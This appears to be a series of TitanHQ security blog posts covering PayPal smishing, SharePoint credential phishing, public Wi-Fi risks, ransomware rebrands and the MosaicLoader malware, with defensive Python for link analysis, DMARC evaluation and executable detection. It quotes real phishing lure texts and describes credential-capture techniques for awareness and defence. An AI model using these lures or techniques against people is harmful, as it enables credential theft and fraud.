ArcTitan is very competitively priced and you only pay for active users. If you are unhappy with your current email archiving provider, changing to ArcTitan is a headache-free process and assistance will be provided by our highly experienced support team. For GDPR compliance, ArcTitan is an ideal email archiving solution.
If you would like to have further information on ArcTitan, contact the TitanHQ team today.
Phishing is commonly associated with spam emails, but it is not the only method of phishing as the PayPal text phishing scam below shows. Phishers use various methods to obtain sensitive information and phishing threats could arrive by email, text message, instant messenger services, and scams can be conducted over the phone.
Phishing is arguably the biggest cyber threat faced by businesses and consumers and can result in a malware infection, the encryption of files via ransomware, theft of sensitive data such as credit/debit card numbers or bank account information, or the email account could be used for sending spam and phishing emails and for malware distribution. A successful phishing attack could prove incredibly costly as bank accounts could easily be emptied. For businesses, malware infections can be catastrophic and billions are lost to business email compromise phishing scams each year.
There are approximately 200 million PayPal users, which makes the online payment service particularly attractive for phishers. PayPal is one of the world’s most commonly spoofed brands. If the brand is spoofed, there is a relatively high probability that the phishing email or text message will be received by a person who has a PayPal account. Further, PayPal accounts usually contain money and they are linked to a bank account and/or credit card. Gaining access to PayPal credentials can see the account and linked bank account emptied.
Phishers use a variety of social engineering techniques to fool end users into installing malware or disclosing their login credentials and other sensitive information. Spam email may be the main method of attack, although the use of text (SMS) messages – often referred to as SMiShing – is growing. This method of phishing can prove more successful for attackers. The PayPal text message phishing scam below is much harder to identify as malicious than many of the PayPal email phishing scams that have been detected in recent weeks.
Beware of this Credible PayPal Text Phishing Scam
This PayPal text phishing scam, and several variants along the same theme, have been detected in recent weeks. The text message appears to have been sent from PayPal from a short code number.
The message reads:
Your account is currently under review. Please complete the following security form to avoid suspension: http://bit[dot]ly/PayPal_-no-sms.eu
Another message reads:
Your account is under review. Please fill in the following security form to avoid lockout: http://bit[dot]ly/_payPal__
These PayPal text phishing scams work because many people do not carefully check messages before clicking links. Click the link on either of those two messages and you will be directed to a website that appears to be the official PayPal website, complete with branding and the normal web layout. However, the websites that the messages direct recipients to are scam sites.
Those sites naturally require the user to enter their login credentials. Doing so passes those credentials to the scammer. The scammer will then use those credentials to access the account, empty it of funds, and plunder the bank account(s) linked to the PayPal account. The password for the account may also be changed to give the attacker more time to make transfers and lock the genuine account holder out of the account.
These scams are particularly effective on smartphones as the full URL of the site being visited is not displayed in the address bar due to the small screen size. It may not be immediately apparent that an individual is not on the genuine PayPal website.
This PayPal text phishing scam shows that you need to always be on your guard, whether accessing your emails or viewing text messages.
Don’t Become a Victim of an SMS Phishing Scam
The PayPal text phishing scam detailed above is just one example of how cybercriminals obtain sensitive information via text message. Any brand could be impersonated. Shortlinks are often used to hide the fact that the website is not genuine, as is altering the link text to mask the true URL.
To avoid becoming a victim of a SMiShing scam, assume any text message correspondence from a retailer or company could be a scam. If you receive a message – typically a warning about security – take the following steps.
Access your account by typing in the correct URL into your web browser. Do not use the link in the message.
Check the status of your account. If there is a freeze on your account, your account is under review, or it has been suspended, this will be clear when you try to log in.
If in doubt, contact the vendor by telephone or send an email, again using verified contact information and not any contact details supplied in the text message (or email).
Before logging in or disclosing any sensitive information online, check the entire URL to make sure the domain and web page are genuine.
PayPal Email Phishing Scams
This PayPal text phishing scam is one of thousands of phishing campaigns targeting PayPal users. While SMS phishing scams are increasing, most phishing attacks are conducted via email.
PayPal email phishing scams can be highly convincing. The emails contain the familiar PayPal logo, the text in the message body is often well written with no grammatical errors or spelling mistakes, the footers contain all the information you would expect, and the font is the same as that used in genuine PayPal messages.
The purpose of PayPal phishing emails will vary depending on the campaign, although typically the aim is:
To fool someone into disclosing their PayPal username/email address and password combination
To obtain a credit/debit card number, expiry date, and CVV code
To obtain bank account information and other personal information that allows the account to be accessed
To obtain a Social Security number and date of birth for use in identity theft and tax fraud
To install malware - Malware can capture all the above information and more
To install ransomware – Ransomware encrypts files and prevents them from being accessed unless a ransom payment is made
PayPal phishing emails can be very convincing and virtually indistinguishable from genuine communications; however, there are often signs that suggest all may not be what it seems.
Some of the common identifiers of PayPal phishing emails have been detailed below:
The messages contain questionable grammar or spelling mistakes.
The hyperlink text suggests one domain, but hovering the mouse pointer over the link (or long-pressing it on a phone) shows that it directs the user to a different domain.
The message does not address the account holder personally and starts with Dear PayPal user, user, or PayPal member instead of using the first and last name or the business name.
A link in the email directs the recipient to a website other than the genuine paypal.com domain or its local sites, paypal.ca or paypal.co.uk for example. Check the registrable domain, not just the start of the address: a hypothetical paypal.com.example.net belongs to example.net, and paypal-secure.com is not paypal.com.
The website the user is asked to visit does not use HTTPS and shows no padlock in the address bar. The reverse is not proof of legitimacy, however: a phishing site can present a valid certificate and a padlock just as easily, as explained below.
The email requests personal information be disclosed such as bank account details, credit card numbers, or security questions and answers.
A user is requested to download or install software on their device.
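The link checks in the list above can be automated. The Python below is an added example, not code from the original post or from SpamTitan: it extracts every hyperlink from an HTML email body and reports the mismatches described above (display text pointing at one domain while the href points at another; a brand name on a host that is not under that brand's registrable domain; URL shorteners; userinfo and raw-IP tricks). It goes beyond the PayPal case by taking a per-brand allowlist, with Microsoft hosts included, so the same check covers collaboration-platform lures. The brand domain list, the shortener list and the sample message are constructed assumptions, and the URL scheme is deliberately ignored because https:// is not evidence of legitimacy.

```python
"""Flag the hyperlink tells of a phishing email in an HTML message body.

Added example, not code from the original post or from TitanHQ. The brand
domain lists, shortener list and sample email are constructed for
illustration only.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts assumed to legitimately belong to each impersonated brand (hypothetical
# allowlist; a production filter maintains a far larger, curated list).
BRAND_DOMAINS = {
    "paypal": ("paypal.com", "paypal.ca", "paypal.co.uk"),
    "microsoft": ("microsoft.com", "microsoftonline.com", "office.com",
                  "sharepoint.com", "live.com"),
}
# A few well-known shorteners (constructed list).
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly"}


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lower-cased hostname of a URL, or '' if it cannot be parsed."""
    try:
        return (urlsplit(url.strip()).hostname or "").lower()
    except ValueError:
        return ""


def under_domain(host, domain):
    """True only for the domain itself or a genuine subdomain of it, so
    'paypal.com.example.net' does NOT count as paypal.com."""
    return host == domain or host.endswith("." + domain)


def brands_in(text):
    t = text.lower()
    return [b for b in BRAND_DOMAINS if b in t]


def analyze_link(href, text):
    """Return the list of indicators for one hyperlink; empty means clean.
    The scheme is ignored on purpose: https:// proves nothing about who
    controls the host."""
    findings = []
    try:
        parts = urlsplit(href.strip())
    except ValueError:
        return ["unparseable href"]
    host = (parts.hostname or "").lower()
    if not host:
        return ["relative or unparseable href"]
    if parts.username is not None:
        findings.append("userinfo before '@' hides the real host")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        findings.append("raw IP address used as host")
    if host in SHORTENERS:
        findings.append("URL shortener hides the destination")
    # Visible text that is itself a URL must point where the href points.
    text_host = host_of(text) if "://" in text else ""
    if text_host and text_host != host:
        findings.append(f"text shows {text_host} but href goes to {host}")
    # A brand named in the text or the host must resolve to that brand's domains.
    for brand in sorted(set(brands_in(text) + brands_in(host))):
        if not any(under_domain(host, d) for d in BRAND_DOMAINS[brand]):
            findings.append(f"{brand} lure but {host} is not a {brand} domain")
    return findings


def analyze_email(html):
    """Map each href in the body to its list of indicators."""
    extractor = LinkExtractor()
    extractor.feed(html)
    return {href: analyze_link(href, text) for href, text in extractor.links}


# Constructed sample body modelled on the message type described above.
SAMPLE_EMAIL = """<p>Dear PayPal user,</p>
<p>Your account is under review. Please
<a href="https://paypal.com.example.net/login">log in to PayPal</a>
to avoid lockout.</p>
<p>Help centre: <a href="https://www.paypal.com/help">https://www.paypal.com/help</a></p>
"""

if __name__ == "__main__":
    for href, findings in analyze_email(SAMPLE_EMAIL).items():
        print(href, "->", findings or "no indicators")
```

Run it as-is to see the constructed message scored; a mail gateway would feed the decoded text/html part of each message to analyze_email and weight the findings alongside its other signals rather than blocking on any single one.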
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
HTTPS Does Not Mean a Website is Genuine
There has been a general push to get businesses to switch from HTTP to HTTPS by installing a TLS certificate (still commonly called an SSL certificate). The certificate binds a public key to a domain name, and for OV/EV certificates also to the details of the organization that requested it; this is what makes the browser show the padlock and an https:// address. It ensures that the connection between the browser and the web server is encrypted and that the browser is talking to a server that controls that domain name. It says nothing about who controls the domain.
If the website has a valid certificate installed, it reduces the potential for snooping on information in transit – credit card details entered into a form, for example. What a certificate does not offer is any guarantee that the party receiving the information is trustworthy.
A website owned or controlled by a cybercriminal can have a valid certificate, an https:// address and a padlock, because certificates are issued automatically to whoever proves control of a domain. Disclosing information on such a site hands it straight to the scammer, encrypted all the way.
As more and more businesses have made the transition to HTTPS, so have cybercriminals. According to the Anti-Phishing Working Group’s (APWG) Q1, 2018 phishing activity trends report, 33% of all phishing websites now use HTTPS and have valid certificates. HTTPS and a padlock (green in older browsers) do not mean that a website is genuine. They only mean that information entered on the site is protected in transit to whoever operates it.
Anti-Phishing Best Practices to Adopt
Exercise caution when someone sends you a hyperlink in a text message or email. The sender may not be who you think it is. A contact or family member’s email account may have been compromised or their phone stolen or the email address may have been spoofed.
Never open email attachments in unsolicited emails from unrecognized senders.
Beware of any email that suggests urgent action must be taken, especially when there is a threat or negative consequences for inaction - your account will be suspended or deleted for example.
If in doubt about the genuineness of an email, do not click any links or open any attachments. Simply delete the message.
Businesses should implement an advanced spam filter to prevent the majority of phishing emails from reaching inboxes.
Businesses should also implement DMARC, backed by SPF and DKIM, so that receiving mail servers reject messages that spoof their exact domains. Note that DMARC does nothing against lookalike domains, which the attacker registers and can authenticate perfectly well.
Businesses should provide ongoing security awareness training to employees to teach them the skills required to identify phishing emails and smishing attempts such as this PayPal text phishing scam.
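As an added example that is not part of the original post or of any TitanHQ product, the following Python evaluates a DMARC policy the way a receiving mail server does, with constructed DNS records standing in for real lookups. It shows why the measure stops exact-domain spoofing of example.com while a lookalike the attacker controls (exarnple.com, with r-n in place of m) passes with its own valid policy, which is the gap that awareness training has to cover.

```python
"""Evaluate DMARC the way a receiving mail server does, to show what it
blocks and what it does not.

Added example, not code from the original post or from TitanHQ's products.
The DMARC records and authentication results are constructed; a real
receiver fetches the TXT record at _dmarc.<domain> from DNS.
"""
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed _dmarc TXT records. 'exarnple.com' is a lookalike domain that
# the attacker registered and configured correctly.
DMARC_RECORDS = {
    "example.com": "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@example.com",
    "example.net": "v=DMARC1; p=none; rua=mailto:reports@example.net",
    "exarnple.com": "v=DMARC1; p=reject",
}


@dataclass
class AuthResult:
    """What SPF and DKIM verification produced for one message."""
    from_domain: str                    # RFC5322.From domain, what the user sees
    spf_domain: Optional[str] = None    # MailFrom domain that passed SPF, if any
    dkim_domains: Tuple[str, ...] = ()  # d= of every DKIM signature that verified


def parse_dmarc(record):
    """Split 'tag=value; ...' into a dict and apply the RFC 7489 defaults."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record: %r" % record)
    tags.setdefault("adkim", "r")  # relaxed alignment unless stated
    tags.setdefault("aspf", "r")
    return tags


def org_domain(domain):
    """Organizational domain, approximated as the last two labels.
    Production code uses the Public Suffix List so that names such as
    example.co.uk are handled correctly."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(auth_domain, from_domain, mode):
    """Identifier alignment: strict needs an exact match, relaxed needs the
    same organizational domain."""
    if not auth_domain:
        return False
    a, f = auth_domain.lower(), from_domain.lower()
    return a == f if mode == "s" else org_domain(a) == org_domain(f)


def evaluate(result, records=DMARC_RECORDS):
    """Return (disposition, reason): 'pass', or the policy to apply on failure
    ('none', 'quarantine', 'reject'), or 'none' when no policy exists."""
    from_domain = result.from_domain.lower()
    record = records.get(from_domain)
    policy_tag = "p"
    if record is None:
        # Subdomain without its own record: use the org domain's sp= (or p=).
        record = records.get(org_domain(from_domain))
        policy_tag = "sp"
    if record is None:
        return "none", "no DMARC record for From domain"
    policy = parse_dmarc(record)
    spf_ok = aligned(result.spf_domain, from_domain, policy["aspf"])
    dkim_ok = any(aligned(d, from_domain, policy["adkim"]) for d in result.dkim_domains)
    if dkim_ok or spf_ok:
        return "pass", "aligned %s identifier" % ("DKIM" if dkim_ok else "SPF")
    return policy.get(policy_tag, policy["p"]), "no aligned SPF or DKIM identifier"


if __name__ == "__main__":
    cases = {
        "genuine": AuthResult("example.com", "bounce.example.com", ("example.com",)),
        "spoofed": AuthResult("example.com", "attacker.net", ("attacker.net",)),
        "p=none": AuthResult("example.net", "attacker.net"),
        "lookalike": AuthResult("exarnple.com", "exarnple.com", ("exarnple.com",)),
    }
    for name, r in cases.items():
        print(f"{name:10s} -> {evaluate(r)}")
```

The "spoofed" case is rejected only because example.com publishes p=reject; the same forgery against example.net, which publishes p=none, is delivered, so the policy must be moved past monitoring mode before it protects anyone. The "lookalike" case passes every check because the attacker controls exarnple.com end to end.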
If you run a business and are concerned about phishing, TitanHQ can help. TitanHQ has developed an award-winning anti-spam and anti-phishing solution that blocks more than 99.9% of spam and malicious messages, incorporates dual anti-virus engines to detect malicious attachments, includes DMARC authentication, and sandboxing to perform in-depth analyses of malicious attachments. The solution works seamlessly with Office 365 to improve phishing detection and keep users' inboxes free from spam, phishing, and other malicious emails. Further, TitanHQ operates a highly competitive pricing policy and SpamTitan can be used at a fraction of the cost of other anti-phishing solutions.
Contact TitanHQ and arrange a product demonstration, sign up for a free trial of the full solution (including support), and discover the difference SpamTitan can make to your organization's security posture.
A new SharePoint phishing scam has been detected which attempts to steal Office 365 credentials from business users. Those credentials are subsequently used to gain access to sensitive company information stored in the cloud and to email accounts, which can then be used in phishing and business email compromise attacks.
The latest scam uses messages that appear to be standard requests to collaborate on SharePoint. This SharePoint phishing scam includes a hyperlink to a document hosted on genuine SharePoint, which may not be flagged as malicious since the link points to a legitimate SharePoint host and the file itself does not contain malware.
The SharePoint file advises the user that the content they are looking for has been uploaded to OneDrive for Business and a further click is necessary to access the file. A hyperlink named “Access Document” is included in the SharePoint file along with the genuine OneDrive for Business logo. At face value, the document does not appear to be malicious, although checking the destination URL of the link will reveal that it directs the user to a suspect website.
After clicking the link, the user is presented with a login window for Office 365 and their Microsoft Office 365 credentials must be entered to proceed. Entering Office 365 credentials at this point will see them harvested by the scammers running this campaign. The user is unlikely to realize that they have been successfully phished as after entering their credentials they will be directed to the genuine Office 365 web page.
This SharePoint phishing scam is being used in targeted attacks on businesses. SharePoint is commonly used by businesses for collaboration, so there is a high probability that employees will be used to receiving such requests. Finding email addresses for business users is also straightforward. Lists can be purchased on darknet marketplaces and hacking forums, or they can be obtained from professional social networking sites such as LinkedIn.
This SharePoint phishing scam, Google Docs phishing scams, and similar campaigns spoofing Dropbox are commonplace and are highly effective. They take advantage of familiarity with these collaboration services, trust in the brands, and the lack of security awareness of employees. These brand impersonation attacks use email formats that are identical to those used in genuine collaboration requests, including correct logos, formatting and genuine-looking links, and can be difficult for end users to identify as malicious.
Preventing these SharePoint spoofing scams requires technological solutions to stop the messages from being delivered and links from being followed. Standard Office 365 anti-phishing protections are not particularly effective at blocking threats such as these. Businesses will be better protected using a dedicated anti-phishing solution on top of Office 365. SpamTitan is an award-winning anti-spam and anti-phishing solution that works seamlessly with Office 365 and provides superior protection against phishing attacks. SpamTitan uses a wide range of innovative techniques to identify malicious emails and block them at source to prevent them from reaching end users’ inboxes.
Security awareness training is also vitally important to condition employees to stop and think before taking any action requested in an email and to raise awareness of the use of collaboration requests in phishing campaigns.
If you want to improve email security and better defend your organization against phishing attacks, contact the TitanHQ team today and request further information on SpamTitan. Product demonstrations can be arranged on request, free trials of the full product are available with full support during the trial, and a range of deployment options are available to suit the needs of your business. Also consider using a web filter such as WebTitan, which will block attempts to access websites used for phishing and malware distribution.
Small businesses often lack the budget to employ full time IT staff, so instead rely on Managed Service Providers (MSPs) to meet their IT and cybersecurity needs. Small businesses know about the importance of having good IT support and will also likely be aware of the need to have some cybersecurity defenses in place, but it can sometimes be difficult to get clients to commit to purchasing the cybersecurity solutions they need to block cyberattacks that could cripple the business.
MSPs therefore need to communicate the importance of cybersecurity and the solutions that are necessary to reduce risk to protect their clients. Without the right solutions in place, clients will be at risk of suffering a costly data breach, and potentially regulatory fines and litigation. It will also be the MSP that will most likely be required to put the time and effort into getting the business back up and running following a cyberattack, and an MSP may also be blamed for not preventing the breach in the first place.
So how can MSPs sell cybersecurity solutions to their clients? What techniques can be used to get clients to commit to purchasing the solutions they need to protect their networks and infrastructure from attack?
Cybersecurity Selling Techniques for MSPs to Improve Customers’ Defenses and Monthly Revenue
Many small businesses will have little in the way of cybersecurity defenses, so this presents MSPs with an opportunity to increase their revenue, but first they must make sure that a client is aware of the importance of cybersecurity and having the right infrastructure and security solutions in place. It is up to the MSP to communicate the need for cybersecurity defenses to block credible threats, as many businesses will not understand the risks they face and the true cost of a data breach.
One of the most important elements of selling cybersecurity to clients is to have a good understanding of the risks a business faces and the level of risk each business is prepared to tolerate. Each business will be different and, most likely, there will be different risks within each business that need to be addressed.
It pays to take some time to audit and review those risks, and then to develop a cybersecurity strategy for the business that is tailored to its needs, rather than trying to sell a standard package of security solutions.
It is unlikely that a small business will be effective at conducting its own cybersecurity risk assessments. By becoming proficient in conducting risk assessments, MSPs can gain a competitive advantage. If an MSP can present an accurate risk assessment to a customer, along with cybersecurity solutions that will reduce all identified risks to a reasonable and acceptable level, it will be much easier to get clients to buy in and sign up for the products and services they need to reduce those risks.
When selling cybersecurity solutions, it pays to focus more on the risks and how they will be addressed, rather than the technical aspects of each solution. That information can naturally be shared if required, but it is better to explain how the solutions meet the needs of the business and the benefits they provide. Cybersecurity solutions are expensive for small businesses, so before a business commits to a purchase – which can involve a significant upfront cost – they need to know the benefits the investment will bring and how it will likely save them considerable costs in the long run by preventing costly data breaches and the resultant downtime.
Customer Support Needs to Include Cybersecurity
Having the right cybersecurity solutions in place is only part of the story. It is also important to ensure that there is adequate monitoring in place. Cybersecurity solutions must be correctly configured and maintained so MSPs will need to make sure the staff is on hand to identify and respond quickly to any threat and neutralize it. Cybersecurity support also needs to be sold to clients.
You must be clear about the difference between IT support and cybersecurity support. Clients are likely to need an MSP to provide basic IT support but may also expect the MSP to deal with cybersecurity issues as well. It is vital to communicate the difference and to cover cybersecurity support when onboarding a new client.
By explaining the need for cybersecurity and providing tailored solutions and the right level of support, MSPs will be able to earn the trust of their clients and be able to reassure them that their infrastructure and data will be kept safe and secure. As the business grows, that trust will be invaluable in getting the business to buy into more advanced cybersecurity solutions as their risk profile changes.
When it comes to finding solutions to meet the needs of MSP clients, TitanHQ can help. TitanHQ provides reasonably priced, powerful and effective cybersecurity solutions to block the most common attack vectors, along with a solution for backing up and archiving business critical data.
For more information on these solutions give the TitanHQ team a call and ask about TitanHQ email security, DNS filtering, and email archiving, and the TitanShield Partner Program. MSPs that join the TitanShield Program will be provided with extensive tools, marketing resources, and training aids to help them sell cybersecurity solutions to their clients more effectively.
The dangers of public Wi-Fi are well documented, but the increase in remote working means the threat has grown. During the pandemic, many businesses had little option other than to allow their employees to work remotely. Remote working during the pandemic meant employees working from home, but now that COVID-19 restrictions are easing, the dangers of public Wi-Fi have reared their head once again. Many businesses have seen benefits to remote working and are continuing to allow employees to work from home, while many others are considering adopting a hybrid working model, where employees can work remotely for at least some of the week.
The Dangers of Public Wi-Fi
There are a variety of risks when accessing the Internet over public Wi-Fi networks, one of the most serious being that the access point people connect to is not actually the Wi-Fi network of the establishment where they are working. It is all too common for threat actors to set up rogue access points that resemble the legitimate ones they spoof. Through those access points – often referred to as evil twins – every connection is monitored, and no transmitted data can be considered secure.
Attackers often inject malicious proxies, eavesdrop on network traffic, and use redirects to send Wi-Fi users to malicious websites. Although less likely in a local coffee shop, other short-range wireless technologies such as Bluetooth and Near Field Communication (NFC) can also be attacked, and such tactics are more commonly reported against travellers abroad. If Bluetooth and NFC are enabled, an attacker can scan for nearby devices and gather information that helps identify and target a particular individual.
How to Reduce Risk
There are various steps that remote workers should take to ensure they do not unwittingly fall victim to a malware infection, disclose their credentials in a phishing attack, or otherwise compromise their device, and in turn, the network of their employer. The most straightforward of these measures is to simply not use public Wi-Fi networks, although that is not always possible for travelling employees.
If it cannot be avoided, it is important to connect to a Wi-Fi hotspot that has encryption and strong authentication, as security will be greater. It is never a good idea to connect to any Wi-Fi network that has no security and does not require a password to connect, but it can be difficult to determine how good Wi-Fi security actually is.
It is important to remember that being asked for a password does not guarantee that the radio link is encrypted: a password typed into a captive portal on an open network protects nothing, so transmitted data may still be intercepted. Even on an encrypted WPA2-PSK network, anyone who knows the shared password and captures a client's four-way handshake can decrypt that client's traffic, so a password printed on the wall offers little protection against others in the same room (WPA3 addresses this, but is not yet widespread on public networks).
It is also possible to downgrade a connection to insecure protocols or obsolete algorithms, and widely available open-source tools can be used to capture credentials and other sensitive data.
It is therefore important to take precautions. For employees, the steps are straightforward. Avoid public Wi-Fi networks if at all possible and avoid disclosing any sensitive data on websites that do not start with HTTPS. Bear in mind that hackers can set up HTTPS websites just as easily as anyone else so be sure not to place too much reliance on https for providing security.
Employees should avoid disclosing any sensitive data or accessing their email or work network entirely over public Wi-Fi if possible, and to ensure that tools supplied by employers – such as a VPN – are used.
Employers should ensure a Virtual Private Network (VPN) is available to employees and there is sufficient capacity to allow all workers to connect. Employers can – and should – extend the protection of their web filtering solution to remote workers’ devices. Web filters will block access to known malicious websites and can block malware downloads. Solutions such as WebTitan are easy to configure to protect remote workers’ devices, and filtering controls will then be applied just as if the employees are in the office.
Standard cybersecurity best practices should also be followed, such as ensuring patches and software are kept up to date, including VPNs. Multifactor authentication should be enabled and anti-malware software installed. Anti-spam solutions – SpamTitan for example – should also be implemented to block email attacks, and firewalls should be used to prevent unauthorized inbound and outbound connections.
It is also recommended to disable Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) on Windows laptops, since both broadcast name lookups that a rogue device on the same network can answer in order to capture NTLM authentication attempts; to configure Web Proxy Auto-Discovery (WPAD) to use only corporate proxy servers, for the same reason; and to turn off file and printer sharing on public networks.
Following the ransomware attacks on critical infrastructure in the United States, several ransomware-as-a-service operations went quiet. The attacks attracted a lot of heat for ransomware gangs and several groups responded by either implementing new restrictions on the types of entities that their affiliates could attack, shutting down entirely and releasing the keys to allow victims to recover, or simply disappeared from the Internet.
Following the attack on Colonial Pipeline in May 2021 by a DarkSide ransomware affiliate, the DarkSide ransomware gang disappeared from the Internet. The REvil ransomware gang that had been so prolific also went quiet. The gang was behind the attack on JBS Foods which caused the temporary shutdown of two meat processing plants in the United States, and most recently, attacked Kaseya and up to 60 of its customers – mostly MSPs – and 1,500 downstream businesses. Shortly after that attack, its web presence disappeared and the gang went deathly silent.
Then there was Avaddon, another prolific operation. After the DarkSide attack on Colonial Pipeline, the Avaddon and REvil operators announced that they would be preventing their affiliates from conducting attacks on critical infrastructure, healthcare, and others. Avaddon later released the keys to allow 2,934 victims to recover and appeared to have walked away from ransomware attacks. Popular hacking forums took the decision to distance themselves from ransomware, even going as far as banning ransomware actors from posting on their forums.
Following the critical infrastructure attacks, the United States government has taken several steps to allow it to target ransomware gangs more effectively and has demanded Russia take action to stop ransomware gangs that are operating within Russia’s borders. The heat has certainly been turned up and RaaS operations are being scrutinized.
There has been considerable speculation about whether government agencies have succeeded in taking down some of these RaaS operations, even though none have announced that they are part of any takedown. That is not to say that there was no law enforcement or government action, only that if there was it has all been done on the quiet.
While it would be nice to think that these shutdowns were permanent and ransomware attacks would be slowing, that is unlikely. It is natural for RaaS operators to lie low for a while following such major attacks, especially when governments are now laser focused on tackling the ransomware problem. It is likely that these ransomware operations are just taking a break, and the operators – and certainly the affiliates that conducted attacks under the RaaS programs – will return. The return may well have already happened.
Two new ransomware-as-a-service (RaaS) groups have appeared this month – Haron and BlackMatter – that threat intelligence firms have been investigating. Several have reported this week that they have identified connections with some of the RaaS operations that have recently gone quiet – Avaddon, REvil, and DarkSide.
While no concrete evidence has been found linking the new operations with any of the RaaS operations that have recently disappeared, there are many similarities which suggest that either the Avaddon, REvil, and DarkSide RaaS operations have already rebranded, that affiliates of those operations have branched out and are going it alone, or some members of the shutdown RaaS operations are involved in Haron and BlackMatter to some degree.
Despite the forum bans on advertising RaaS operations, BlackMatter has been advertising for affiliates on Russian-speaking cybercrime forums, albeit without stating that it is running a RaaS operation. A user named “BlackMatter” registered an account on July 19 on both the XSS and Exploit criminal forums seeking to buy access to the networks of U.S., UK, Australian, or Canadian companies with over $100 million in annual revenue. They also stipulated that they would not be buying access to state institutions or any targets in the healthcare sector, just as REvil and Avaddon announced they would not after the Colonial Pipeline attack.
The BlackMatter operator also created an Escrow account – used in cases of disputes over payments – and deposited $120,000 – a not insignificant sum. The group is offering between $3K and $100K for access or a share in any ransoms generated in exchange for access. The BlackMatter operators claim their operation incorporates the best features of DarkSide, REvil, and LockBit, all three of which are believed to have operated from within Russia.
Several cybersecurity firms found similarities between BlackMatter, REvil and DarkSide, with Recorded Future describing BlackMatter as the successor to DarkSide and REvil, although the evidence is circumstantial. For instance, the name BlackMatter closely resembles BlackLivesMatter, the name of the Windows registry key used by REvil. Mandiant reports evidence pointing to at least one member of the DarkSide operation being involved with BlackMatter, although that individual may simply be an affiliate who jumped ship when the operation went silent.
The same caution applies to the comparison between Haron and Avaddon: the similarities may be coincidence, or the operator may simply have saved time by reusing content and code that had already been written. There are notable differences between the two in many areas, and no solid proof has been found that Avaddon and Haron are one and the same.
Researchers are still investigating the new groups, but regardless of who is involved, their aims appear to be very similar. Both are targeting large organizations with deep pockets, and if the RaaS operations that have gone quiet remain out of action, there will be many affiliates looking for a new RaaS operation to join.
These two new RaaS operations could therefore completely fill the gap left by the likes of Avaddon, REvil, and DarkSide and ransomware attacks could well continue at pre-May 2021 levels. What is certain is the ransomware threat is far from over.
A new malware variant has appeared that is being pushed out via malicious search engine advertisements that appear at the top of the listings for searches related to cracked software. The new malware has been dubbed MosaicLoader by Bitdefender researchers, who have seen increasing numbers of the malware appear in recent weeks.
As the name suggests, MosaicLoader is a malware downloader. It has been developed to deliver a range of different payloads onto victims’ devices, with the ‘Mosaic’ part of the name coming from the intricate internal structure of the malware, which was developed to hamper attempts by security researchers to analyze and reverse engineer the malware.
The malware is complex and uses a variety of methods to evade detection and hamper attempts at analysis, including code obfuscation with the code broken into small chunks, shuffling the execution order and creating a mosaic-like structure. The malware also mimics the file information of legitimate software.
The current campaign delivering MosaicLoader targets people looking for cracked software, with the adverts appearing in the search engine listings for a variety of keywords associated with pirated software. The initial droppers masquerade as executables for legitimate software, reusing company names and descriptions in the file metadata along with similar icons and version information.
The droppers use a variety of names linked to pirated software, including mirc-7-64-keygen-plus-crack-fully-version-free-download, officefix-professional6-122-crack-full-version-latest-2021, and setup-starter_v2.3.1. One of the droppers mimics a legitimate NVIDIA process, although its digital signature is unrelated to NVIDIA, which is the one check that copied metadata cannot pass. Once a user runs one of these installers, the infection chain starts and runs in the background with no visible windows, so the user is not alerted.
What makes MosaicLoader particularly dangerous is it can be used to deliver any payload onto a victim’s system. The malware has been observed delivering a broad range of malicious payloads, such as Remote Access Trojans (RATs) and backdoors, cookie stealers, and cryptocurrency miners. Based on the payloads delivered it is likely that, at least initially, MosaicLoader is being operated and used by one threat group, but it could easily be used under the malware-as-a-service model as a malware delivery service.
Protecting against MosaicLoader is straightforward in principle. Users should avoid downloading any cracked software. Not only is it illegal to download cracked software, but there is also a reasonable likelihood that doing so will install malware such as MosaicLoader, spyware, adware, and many potentially unwanted programs (PUPs). It is also necessary to have up to date antivirus/antimalware software installed.
Employees are always looking for ways to make their lives easier and installing unauthorized software – shadow IT – is common. Shadow IT may save an employee time during their working day, but it also carries risks, especially the installation of pirated software. This has become even more of a risk in the COVID-19 era with so many employees working from home.
Businesses can improve protection against MosaicLoader and other malware variants by carefully controlling the websites that employees can access on their corporate devices and under BYOD. Content filters, such as WebTitan, can be configured to restrict access to websites not required for work or block certain categories of website, as well as known malicious URLs.
Web filters can also be configured to block downloads of specific file types, such as software installers and other executable files often used to install malware. It should also be made clear to all staff that the downloading of unauthorized software onto corporate devices is prohibited, and that the installation of cracked software is illegal.
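The following Python, added here as an example and not taken from the original post or from WebTitan, shows how a download filter can enforce an executable-blocking rule by looking at the content rather than trusting the file name or the server's Content-Type header, since a dropper named like a PDF or an image is still a PE file underneath. The byte strings and file names are constructed; the minimal PE image contains only the two headers needed to be recognised.

```python
"""Decide whether a download is an executable by inspecting its content,
not its file name or the Content-Type header the server sent.

Added example, not code from the original post or from WebTitan. The byte
strings are constructed stand-ins for real downloads.
"""
import struct

EXECUTABLE_EXTENSIONS = {"exe", "msi", "dll", "scr", "com", "bat", "cmd",
                         "ps1", "vbs", "js", "jse", "hta", "jar"}
BLOCK_KINDS = {"pe", "dos-mz", "elf", "mach-o", "script"}
INSPECT_KINDS = {"zip", "ole"}


def content_kind(data):
    """Label the format from its leading bytes, or None if not recognised."""
    if data[:2] == b"MZ":
        # Windows PE: the DOS header stores the PE header offset at 0x3C.
        if len(data) >= 0x40:
            pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
            if data[pe_offset:pe_offset + 4] == b"PE\0\0":
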